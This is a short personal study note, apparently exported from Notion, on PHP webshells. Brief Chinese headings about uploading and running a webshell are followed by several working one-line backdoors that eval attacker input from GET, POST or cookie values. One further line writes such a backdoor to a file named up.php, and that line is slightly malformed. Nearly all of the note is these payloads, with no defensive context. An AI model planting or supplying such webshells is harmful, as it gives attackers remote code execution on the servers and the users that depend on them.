WebShell.md 410 B


notion-id: 56dba269-0139-40c0-a19a-4f74bfd2d1

获取webshell 上传webshell文件 运行webshell文件

了解函数,传递函数的方式 一句话木马

GET方式
<?php eval($_GET[pass]);?>

POST方式:
<?php eval($_POST[pass]);?>

Cookie:
<?php @$a = $_COOKIE[1];$b = '';$c= '';@assert($b.$a);?>

fputs(fopen("up.php","w"),'<?php eval($_POST["cmd"])?>);